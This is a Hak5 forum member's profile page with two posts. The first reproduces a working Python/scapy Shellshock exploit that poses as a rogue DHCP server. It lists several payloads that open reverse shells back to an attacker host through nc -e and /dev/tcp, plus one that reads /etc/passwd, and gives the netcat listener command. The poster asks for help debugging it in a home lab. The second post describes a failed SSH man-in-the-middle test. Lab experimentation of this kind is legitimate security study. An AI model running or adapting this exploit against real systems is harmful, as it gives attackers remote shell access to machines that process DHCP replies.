Jump to content
Hak5 Forums

KST

Members
  • Content count

    2
  • Joined

  • Last visited

About KST

  • Rank
    Newbie
  1. Hi I had known about shellshock exploit. I want to test it and download dhclient python file from www.exploit-db.com. I modified a little the python file and run in ubuntu 16.04 which has virtual box . The victim is Ubuntu 14.04 in virtual box. But I did not succeed. Following are my code. #!/usr/bin/python # Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC # Date: 2014-09-29 # Author: @fdiskyou # e-mail: rui at deniable.org # Version: 4.1 # Tested on: Debian, Ubuntu, Kali # CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187 from scapy.all import * conf.checkIPaddr = False fam,hw = get_if_raw_hwaddr(conf.iface) victim_assign_ip = "192.168.56.102" server_ip = "192.168.56.1" gateway_ip = "192.168.56.1" subnet_mask = "255.255.255.0" dns_ip = "8.8.8.8" spoofed_mac = "0a:00:27:00:00:00" payload = "() { ignored;}; echo 'moo'" payload_2 = "() { ignored;}; /bin/nc -e /bin/bash 192.168.56.1 4444" payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/192.168.56.1/4444 0>&1 &" payload_4 = "() { ignored;}; /bin/cat /etc/passwd" payload_5 = "() { ignored;}; /usr/bin/wget http://google.com" #rce=payload_5 rce= "() {:;}; exec 5<>/dev/tcp/192.168.56.1/4444 && cat <&5 | while read line; do $line 2>&5 >&5 ; done" #rce= "(){ ignored;}; /bin/bash -c 'gnome-screensaver-command --lock'" def toMAC(strMac): cmList = strMac.split(":") hCMList = [] for iter1 in cmList: hCMList.append(int(iter1, 16)) hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5]) return hMAC def detect_dhcp(pkt): # print 'Process ', ls(pkt) if DHCP in pkt: # if DHCP Discover then DHCP Offer if pkt[DHCP].options[0][1]==1: clientMAC = pkt[Ether].src print "DHCP Discover packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid, sname=server_ip )/ DHCP(options=[('message-type','offer')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vboxnet0" ) print "DHCP Offer packet sent" # if DHCP Request than DHCP ACK if pkt[DHCP] and pkt[DHCP].options[0][1] == 3: clientMAC = pkt[Ether].src print "DHCP Request packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid )/ DHCP(options=[('message-type','ack')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vboxnet0" ) print "DHCP Ack packet sent" def main(): #sniff DHCP requests sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vboxnet0") if __name__ == '__main__': sys.exit(main()) And I run this on my host OS. nc -lvp 4444 Please help me to find the error.
  2. SSH MITM

    Hi I test the ssh mitm by the way this link. I have three PC ;attacker PC,ssh server and ssh client.After all instruction are made, I connect ssh to server from client .But when I do this , I cannot login with user from server. I can only login with attacker 's username and password and get logined to attacker pc.It means that attacker pc doesnot redirect to ssh server. But I have completed all instructions described in that link. If you have time, please check my question and answer me.
×